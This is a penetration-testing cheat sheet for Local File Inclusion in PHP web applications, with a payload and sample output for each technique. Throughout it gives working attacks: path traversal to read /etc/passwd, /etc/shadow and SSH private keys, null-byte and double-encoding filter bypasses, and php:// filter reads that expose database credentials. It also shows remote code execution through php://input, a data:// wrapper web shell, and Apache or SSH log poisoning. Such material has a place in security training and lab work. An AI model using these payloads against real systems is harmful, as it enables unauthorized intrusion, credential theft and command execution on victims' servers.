LOCAL FILE INCLUSION (LFI)
Basic LFI test
Path traversal — Confirm LFI exists
http://$IP/page.php?file=../../../etc/passwd
Example Output
http://10.10.10.5/page.php?file=../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin
www-data:x:33:33:www-data:/var/www
admin:x:1000:1000::/home/admin:/bin/bash
(LFI CONFIRMED)
Null byte bypass (old PHP)
PHP < 5.3.4 — Bypass extension append
http://$IP/page.php?file=../../../etc/passwd%00
Example Output
http://10.10.10.5/page.php?file=../../../etc/passwd%00
Code appends .php: include($_GET['file'] . '.php');
Null byte terminates string early in PHP < 5.3.4
Result: reads /etc/passwd instead of /etc/passwd.php
Double encoding
Bypass basic filters — URL encode twice
http://$IP/page.php?file=%252e%252e%252f%252e%252e%252fetc/passwd
Example Output
http://10.10.10.5/page.php?file=%252e%252e%252f%252e%252e%252fetc/passwd
%25 = %, so %252e = %2e = .
Server decodes twice: %252e%252e%252f -> ../
Bypasses WAF/filter that checks for ../
PHP wrapper - base64 read
Read PHP source code — See credentials in config
http://$IP/page.php?file=php://filter/convert.base64-encode/resource=config.php
Example Output
http://10.10.10.5/page.php?file=php://filter/convert.base64-encode/resource=config.php
PD9waHAKJGRiX2hvc3QgPSAnbG9jYWxob3N0JzsK...
base64 -d:
<?php
$db_host = 'localhost';
$db_user = 'admin';
$db_pass = 'SuperSecret123';
PHP wrapper - command exec
RCE via php://input — Direct command execution
curl http://$IP/page.php?file=php://input -d '<?php system("id"); ?>'
Example Output
curl http://10.10.10.5/page.php?file=php://input -d '<?php system("id"); ?>'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
(RCE CONFIRMED via php://input)
PHP data wrapper
RCE via data:// — base64 of <?php system($_GET['cmd']);?>
http://$IP/page.php?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=&cmd=id
Example Output
http://10.10.10.5/page.php?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=&cmd=id
base64 decodes to: <?php system($_GET['cmd']);?>
Response: uid=33(www-data)
(RCE via data:// wrapper)
Log poisoning (Apache)
Inject PHP into logs, include log — RCE via log file
curl -A '<?php system($_GET["cmd"]); ?>' http://$IP
then: http://$IP/page.php?file=/var/log/apache2/access.log&cmd=id
Example Output
Step 1: curl -A '<?php system($_GET["cmd"]); ?>' http://10.10.10.5
Step 2: http://10.10.10.5/page.php?file=/var/log/apache2/access.log&cmd=id
... uid=33(www-data) gid=33(www-data) ...
(RCE via log poisoning)
Log poisoning (SSH)
Inject PHP via SSH username — Alternative log poisoning
ssh '<?php system($_GET["cmd"]); ?>'@$IP
then include /var/log/auth.log
Example Output
ssh '<?php system($_GET["cmd"]); ?>'@10.10.10.5
Permission denied
But PHP code is now in /var/log/auth.log
http://10.10.10.5/page.php?file=/var/log/auth.log&cmd=id
uid=33(www-data)
(RCE via SSH log poisoning)
Read SSH keys
Steal private keys — SSH access
http://$IP/page.php?file=../../../home/<user>/.ssh/id_rsa
Example Output
http://10.10.10.5/page.php?file=../../../home/admin/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA...
-----END RSA PRIVATE KEY-----
Save to file, chmod 600, ssh -i id_rsa admin@target
(LFI to SSH key = instant foothold)
Read /etc/shadow (if root)
Password hashes — Crack with hashcat/john
http://$IP/page.php?file=../../../etc/shadow
Example Output
http://10.10.10.5/page.php?file=../../../etc/shadow
root:$6$abc123$LongHashHere:19000:0:99999:7:::
admin:$6$def456$AnotherHash:19000:0:99999:7:::
(Copy hashes, crack with hashcat -m 1800)
Common files to read
Sensitive file targets — Creds, users, config
/etc/passwd
/etc/shadow
/etc/hosts
/home/<user>/.bash_history
/proc/self/environ
/var/www/html/config.php
/var/www/html/.htpasswd
Example Output
/etc/passwd -> usernames
/etc/shadow -> password hashes (if readable)
/home/user/.ssh/id_rsa -> SSH private key
/var/www/html/config.php -> DB credentials
/proc/self/environ -> environment variables with secrets
~/.bash_history -> command history with passwords
Windows LFI paths
Windows file targets — Windows path format
..\..\..\windows\system32\drivers\etc\hosts
..\..\..\windows\win.ini
..\..\..\inetpub\wwwroot\web.config
Example Output
..\..\..\windows\system32\drivers\etc\hosts
-> 127.0.0.1 localhost
..\..\..\inetpub\wwwroot\web.config
-> <connectionStrings>Password=DBp@ss</connectionStrings>
..\..\..\windows\win.ini
-> [fonts] (confirms LFI on Windows)